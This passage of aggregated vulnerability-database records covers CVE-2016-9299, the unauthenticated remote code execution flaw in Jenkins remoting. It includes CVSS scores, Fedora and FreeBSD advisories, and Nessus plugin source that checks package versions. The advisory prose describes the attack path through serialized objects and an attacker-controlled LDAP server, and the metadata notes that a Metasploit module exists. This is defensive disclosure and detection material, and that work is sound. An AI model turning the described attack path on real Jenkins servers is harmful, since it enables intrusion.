"bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2023-01-27T05:02:34", "id": "GHSA-2X9H-H3C4-WQQH", "href": "https://github.com/advisories/GHSA-2x9h-h3c4-wqqh", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:02:40", "description": "No description provided by source.", "cvss3": {}, "published": "2016-11-26T00:00:00", "type": "seebug", "title": "Jenkins remoting module remote command execution vulnerability, CVE-2016-9299\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2016-11-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92557", "id": "SSV:92557", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "This package is primarily used by Jenkins for slave node management, but it could be potentially reused outside of this project. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T15:57:40", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: jenkins-remoting-2.62.3-1.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-12-01T15:57:40", "id": "FEDORA:00FE3602E41B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZW2KUKYLNLVDB7STLHLYALCUFLEGCRM6/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "Jenkins is an award-winning, cross-platform, continuous integration and continuous delivery application that increases your productivity. Use Jenkins to build and test your software projects continuously making it easier for developers to integrate changes to the project, and making it easier for users to obtain a fresh build. It also allows you to continuously deliver your software by providing powerful ways to define your build pipelines and integrating with a large number of testing and deployment technologies. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-01T15:57:40", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: jenkins-1.651.3-2.fc25", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-12-01T15:57:40", "id": "FEDORA:E7173602E415", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QFJT3TVJVZH5CAVZOY7CPBY3DK7E4CPO/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Jenkins is an award-winning, cross-platform, continuous integration and continuous delivery application that increases your productivity. Use Jenkins to build and test your software projects continuously making it easier for developers to integrate changes to the project, and making it easier for users to obtain a fresh build. It also allows you to continuously deliver your software by providing powerful ways to define your build pipelines and integrating with a large number of testing and deployment technologies. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-05T20:50:46", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: jenkins-1.651.3-2.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-03-05T20:50:46", "id": "FEDORA:ACB376074FEE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZE7XYOLIPAJFIIPWZPAVZYEAOAT6LHIJ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "This package is primarily used by Jenkins for slave node management, but it could be potentially reused outside of this project. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-05T20:50:46", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: jenkins-remoting-2.62.3-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-03-05T20:50:46", "id": "FEDORA:CCC6D6078F5C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/XKRLBXFPKTEBV4JI66GC2KQDE3TLZMYR/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-08-19T12:38:43", "description": "Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-01T00:00:00", "type": "nessus", "title": "Fedora 25 : jenkins / jenkins-remoting (2016-368780879d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jenkins", "p-cpe:/a:fedoraproject:fedora:jenkins-remoting", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-368780879D.NASL", "href": "https://www.tenable.com/plugins/nessus/95446", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-368780879d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95446);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9299\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n\n script_name(english:\"Fedora 25 : jenkins / jenkins-remoting (2016-368780879d)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-368780879d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"jenkins-1.651.3-2.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"jenkins-remoting-2.62.3-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:21", "description": "Jenkins Security Advisory :\n\nAn unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java object to the Jenkins CLI, making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading to code execution, bypassing existing protection mechanisms.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-16T00:00:00", "type": "nessus", "title": "FreeBSD : jenkins -- Remote code execution vulnerability in remoting module (27eee66d-9474-44a5-b830-21ec12a1c307)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:jenkins", "p-cpe:/a:freebsd:freebsd:jenkins-lts", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL", "href": "https://www.tenable.com/plugins/nessus/94918", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94918);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-9299\");\n\n script_name(english:\"FreeBSD : jenkins -- Remote code execution vulnerability in remoting module (27eee66d-9474-44a5-b830-21ec12a1c307)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jenkins Security Advisory :\n\nAn unauthenticated remote code execution vulnerability allowed\nattackers to transfer a serialized Java object to the Jenkins CLI,\nmaking Jenkins connect to an attacker-controlled LDAP server, which in\nturn can send a serialized payload leading to code execution,\nbypassing existing protection mechanisms.\"\n );\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c434d472\"\n );\n # https://vuxml.freebsd.org/freebsd/27eee66d-9474-44a5-b830-21ec12a1c307.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5bd25ad\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins-lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<=2.31\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"jenkins-lts<=2.19.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:21:16", "description": "Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-06T00:00:00", "type": "nessus", "title": "Fedora 24 : jenkins / jenkins-remoting (2016-93679a91df)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jenkins", "p-cpe:/a:fedoraproject:fedora:jenkins-remoting", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-93679A91DF.NASL", "href": "https://www.tenable.com/plugins/nessus/97533", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-93679a91df.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97533);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9299\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n\n script_name(english:\"Fedora 24 : jenkins / jenkins-remoting (2016-93679a91df)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-9299\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-93679a91df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Jenkins CLI HTTP Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"jenkins-1.651.3-2.fc24\")) flag++;\nif (rpm_check(release:\"FC24\", reference:\"jenkins-remoting-2.62.3-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nJenkins Security Advisory:\n\nAn unauthenticated remote code execution vulnerability allowed\n\t attackers to transfer a serialized Java object to the Jenkins CLI,\n\t making Jenkins connect to an attacker-controlled LDAP server, which\n\t in turn can send a serialized payload leading to code execution,\n\t bypassing existing protection mechanisms.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-11T00:00:00", "type": "freebsd", "title": "jenkins -- Remote code execution vulnerability in remoting module", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2016-11-11T00:00:00", "id": "27EEE66D-9474-44A5-B830-21EC12A1C307", "href": "https://vuxml.freebsd.org/freebsd/27eee66d-9474-44a5-b830-21ec12a1c307.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java object to the Jenkins CLI, making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading to code execution, bypassing existing protection mechanisms. (CVE-2016-9299) \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 